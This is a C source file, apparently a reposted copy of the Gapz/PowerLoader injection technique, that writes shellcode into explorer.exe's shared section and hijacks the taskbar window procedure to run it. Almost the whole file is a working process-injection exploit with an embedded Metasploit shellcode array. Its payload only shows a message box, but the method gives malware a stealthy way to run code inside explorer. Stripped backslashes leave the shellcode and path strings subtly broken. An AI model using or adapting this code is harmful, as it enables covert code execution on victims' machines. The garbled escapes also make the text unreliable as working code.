gapz注入代码

#include <stdio.h>

#include <windows.h>
#include <winternl.h>
#include <string.h>
#include <tlhelp32.h>

// ASCII marker
#define MARKER "I'm in ur address-space man!"
#define SIZE_MARKER strlen(MARKER)

// Declarations
#define STATUS_SUCCESS ((NTSTATUS)0)

typedef enum _SECTION_INHERIT {
  ViewShare = 1,
  ViewUnmap = 2
} SECTION_INHERIT, *PSECTION_INHERIT;

extern "C"
{
NTSTATUS NTAPI ZwOpenSection(
   PHANDLE SectionHandle,
   ACCESS_MASK DesiredAccess,
   POBJECT_ATTRIBUTES ObjectAttributes
);

NTSTATUS NTAPI ZwClose(
   HANDLE Handle
);

NTSTATUS NTAPI ZwUnmapViewOfSection(
   HANDLE ProcessHandle,
   PVOID BaseAddress
);

NTSTATUS NTAPI ZwMapViewOfSection(
   HANDLE SectionHandle,
   HANDLE ProcessHandle,
   PVOID *BaseAddress,
   ULONG_PTR ZeroBits,
   SIZE_T CommitSize,
   PLARGE_INTEGER SectionOffset,
   PSIZE_T ViewSize,
   SECTION_INHERIT InheritDisposition,
   ULONG AllocationType,
   ULONG Win32Protect
);
}

// Definitions

VOID fatal_error(PCHAR msg)
{
fprintf(stderr, "%s ", msg);
ExitProcess(0);
}

DWORD find_marker_in_region(PCHAR buffer, DWORD size)
{
if(SIZE_MARKER > size)
      fatal_error("Failed in" __FUNCTION__);

for(DWORD i = 0; i < (size - SIZE_MARKER); ++i)
      if(memcmp(buffer + i, MARKER, SIZE_MARKER) == 0)
         return i;

return 0xffffffff;
}

DWORD get_explorer_pid()
{
HANDLE hProcessSnap;
PROCESSENTRY32 pe32 = {0};
DWORD explorer_pid = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)
      fatal_error("Failed in " __FUNCTION__);

pe32.dwSize = sizeof(PROCESSENTRY32);

if(!Process32First(hProcessSnap, &pe32))
      fatal_error("Failed in " __FUNCTION__);

do
{
      if(strcmp(pe32.szExeFile, "explorer.exe") == 0)
      {
         explorer_pid = pe32.th32ProcessID;
         break;
      }
} while(Process32Next(hProcessSnap, &pe32));

CloseHandle(hProcessSnap);
if(explorer_pid == 0)
      fatal_error("Failed in " __FUNCTION__);

return explorer_pid;
}

DWORD find_marker_in_explorer(HANDLE hProcess, DWORD base_address_region, DWORD size_region)
{
DWORD size_read, idx_marker;
PCHAR buffer = (PCHAR)malloc(size_region);

if(buffer == 0)
      fatal_error("Failed in " __FUNCTION__);

if(ReadProcessMemory(
      hProcess,
      (LPVOID)base_address_region,
      buffer,
      size_region,
      &size_read
) == FALSE)
      return 0;

idx_marker = find_marker_in_region(buffer, size_region);
if(idx_marker == 0xffffffff)
      return 0;

free(buffer);
return base_address_region + idx_marker + SIZE_MARKER;
}

DWORD get_shellcode_address()
{
HANDLE hProcess;
DWORD pid_explorer = get_explorer_pid(), base_address = 0,
      shellcode_address = 0, bytes_read,
      first_indirection, second_indirection;
MEMORY_BASIC_INFORMATION mem_info = {0};

if(pid_explorer == 0)
      fatal_error("Failed in " __FUNCTION__);

printf("       Explorer.exe's PID: %d ", pid_explorer);
hProcess = OpenProcess(
      PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
      FALSE,
      pid_explorer
);

if(hProcess == NULL)
      fatal_error("Failed in " __FUNCTION__);

while(TRUE)
{
      bytes_read = VirtualQueryEx(
         hProcess,
         (PVOID)base_address,
         &mem_info,
         sizeof(mem_info)
      );

      if(bytes_read != sizeof(mem_info))
         return 0;

      printf("       Looking for the marker in [%.8x - %.8x].. ", base_address, base_address + mem_info.RegionSize);
      if((shellcode_address = find_marker_in_explorer(hProcess, base_address, mem_info.RegionSize)) != 0)
         break;

      base_address += mem_info.RegionSize;
}

/*
      In the shared section we have:
      address: 0x1337 [0x0000133b][0x0000133f][Payload]

      CPU Disasm
      Address Hex dump       Command                               Comments
      01001B4A  |.  8B06       MOV EAX,DWORD PTR [ESI] ; ESI is a pointer on the value we give at SetWindowLong (that's why we need two indirection)
      01001B4C  |.  56          PUSH ESI
      01001B4D    FF10       CALL DWORD PTR [EAX]

      First, ESI=0x1337
      Then EAX = 0x133b
      Finally CALL [0x133b] = CALL 0x133f => BOOM
*/
first_indirection = shellcode_address + 4;
printf("Writing %.8x @ %.8x ", first_indirection, shellcode_address);
WriteProcessMemory(
      hProcess,
      (PVOID)shellcode_address,
      &first_indirection,
      sizeof(DWORD),
      NULL
);

second_indirection = first_indirection + 4;
printf("Writing %.8x @ %.8x ", second_indirection, shellcode_address + 4);
WriteProcessMemory(
      hProcess,
      (PVOID)(shellcode_address + 4),
      &second_indirection,
      sizeof(DWORD),
      NULL
);

return shellcode_address;
}

BOOL write_shellcode_in_shared_section()
{
/*
C:metasploitmsf3>.. ubyin uby.exe msfpayload windows/messagebox TITLE="0vercl0k iz in your explorer man!" TEXT="Hi from the explorer dewd o/" P
# windows/messagebox - 315 bytes
# http://www.metasploit.com
# VERBOSE=false, EXITFUNC=process, TITLE=0vercl0k iz in your explorer man!, TEXT=Hi from the explorer dewd o/, ICON=NO
my $buf =
"xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64" .
"x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e" .
"x20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60" .
"x8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8b" .
"x4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01" .
"xeex31xffx31xc0xfcxacx84xc0x74x07xc1xcfx0d" .
"x01xc7xebxf4x3bx7cx24x28x75xe1x8bx5ax24x01" .
"xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01" .
"xe8x89x44x24x1cx61xc3xb2x08x29xd4x89xe5x89" .
"xc2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45" .
"x04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxff" .
"xffx89x45x08x68x6cx6cx20x41x68x33x32x2ex64" .
"x68x75x73x65x72x88x5cx24x0ax89xe6x56xffx55" .
"x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52xe8" .
"x61xffxffxffx68x21x58x20x20x68x20x6dx61x6e" .
"x68x6fx72x65x72x68x65x78x70x6cx68x6fx75x72" .
"x20x68x69x6ex20x79x68x20x69x7ax20x68x63x6c" .
"x30x6bx68x30x76x65x72x31xdbx88x5cx24x21x89" .
"xe3x68x58x20x20x20x68x64x20x6fx2fx68x20x64" .
"x65x77x68x6fx72x65x72x68x65x78x70x6cx68x74" .
"x68x65x20x68x72x6fx6dx20x68x48x69x20x66x31" .
"xc9x88x4cx24x1cx89xe1x31xd2x52x53x51x52xff" .
"xd0x31xc0x50xffx55x08";
*/
UCHAR payload[] = "xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7ex20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60x8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01xeex31xffx31xc0xfcxacx84xc0x74x07xc1xcfx0dx01xc7xebxf4x3bx7cx24x28x75xe1x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8x89x44x24x1cx61xc3xb2x08x29xd4x89xe5x89xc2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45x04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxffxffx89x45x08x68x6cx6cx20x41x68x33x32x2ex64x68x75x73x65x72x88x5cx24x0ax89xe6x56xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52xe8x61xffxffxffx68x21x58x20x20x68x20x6dx61x6ex68x6fx72x65x72x68x65x78x70x6cx68x6fx75x72x20x68x69x6ex20x79x68x20x69x7ax20x68x63x6cx30x6bx68x30x76x65x72x31xdbx88x5cx24x21x89xe3x68x58x20x20x20x68x64x20x6fx2fx68x20x64x65x77x68x6fx72x65x72x68x65x78x70x6cx68x74x68x65x20x68x72x6fx6dx20x68x48x69x20x66x31xc9x88x4cx24x1cx89xe1x31xd2x52x53x51x52xffxd0x31xc0x50xffx55x08";
NTSTATUS result;
BOOL ret = TRUE;
HANDLE hSection = INVALID_HANDLE_VALUE;
UNICODE_STRING obj_name = {0};
OBJECT_ATTRIBUTES obj = {0};
PUCHAR base_address_view = 0;
SIZE_T viewsize = 0;

RtlInitUnicodeString(&obj_name, L"\BaseNamedObjects\ShimSharedMemory");

InitializeObjectAttributes(
      &obj,
      &obj_name,
      OBJ_CASE_INSENSITIVE,
      NULL,
      NULL
);

printf(" Opening the section..");
result = ZwOpenSection(
      &hSection,
      GENERIC_WRITE,
      &obj
);

if(result != STATUS_SUCCESS)
{
      printf("Failed in " __FUNCTION__ ": %.8x. ", result);
      ret = FALSE;
      goto clean;
}

printf("OK ");

printf(" Map-ing a view of this section in our address space..");
result = ZwMapViewOfSection(
      hSection,
      GetCurrentProcess(),
      (PVOID*)&base_address_view,
      (ULONG_PTR)NULL,
      0,
      NULL,
      &viewsize,
      ViewUnmap,
      0,
      PAGE_READWRITE
);

if(result != STATUS_SUCCESS)
{
      printf("Failed in " __FUNCTION__ ": %.8x. ", result);
      ret = FALSE;
      goto clean;
}

printf("OK at %.8x (%d bytes). ", base_address_view, viewsize);

printf(" Writing the payload in the shared section..");
memcpy((base_address_view + viewsize) - (sizeof(payload) + SIZE_MARKER + 4 + 4), MARKER, SIZE_MARKER);
memcpy(((base_address_view + viewsize) - sizeof(payload)), payload, sizeof(payload));
printf("OK. ");

clean:
if(hSection != INVALID_HANDLE_VALUE)
{
      ZwUnmapViewOfSection(GetCurrentProcess(), base_address_view);
      ZwClose(hSection);
}

return ret;
}

BOOL modify_winproc_taskbar_window()
{
BOOL ret = TRUE;
HWND hTaskbarWindow = FindWindow("Shell_TrayWnd", NULL);
LONG taskbarWinproc = 0;
DWORD shellcode_address = 0;

printf(" Where are you Shell_TrayWnd, where are you..");
if(hTaskbarWindow == 0)
{
      printf("Failed in " __FUNCTION__ ". ");
      ret = FALSE;
      goto clean;
}

printf("OK. ");

printf(" Retrieving its windows procedure..");
taskbarWinproc = GetWindowLong(hTaskbarWindow, 0);

if(taskbarWinproc == 0)
{
      printf("Failed in " __FUNCTION__ ". ");
      ret = FALSE;
      goto clean;
}

printf("OK at %.8x. ", taskbarWinproc);

printf(" Getting the shellcode address.. ");
shellcode_address = get_shellcode_address();
if(shellcode_address == 0)
{
      printf("Failed in " __FUNCTION__ ". ");
      ret = FALSE;
      goto clean;
}

printf("OK at 0x%.8x. ", shellcode_address);

printf(" Setting the windows procedure ..");
SetWindowLong(hTaskbarWindow, 0, shellcode_address);
printf("OK. ");

printf(" Pulling the trigger, BRAAAAAA ");
SendNotifyMessage(
      hTaskbarWindow,
      0xf,
      0,
      0
);

Sleep(1);

printf(" Putting back its winproc ");
SetWindowLong(hTaskbarWindow, 0, taskbarWinproc);

clean:
return ret;
}

int main()
{
printf("1] Writing the shellcode in the shared section mapped in explorer.exe's address space ");
if(write_shellcode_in_shared_section() == FALSE)
      return -1;

printf(" 2] Looking for the taskbar window, a pointer onto shellcode in the explorer's memory and modify its windows procedure ");
if(modify_winproc_taskbar_window() == FALSE)
      return -1;

printf(" 3] Profit! ");
return 0;
}

---恢复内容结束---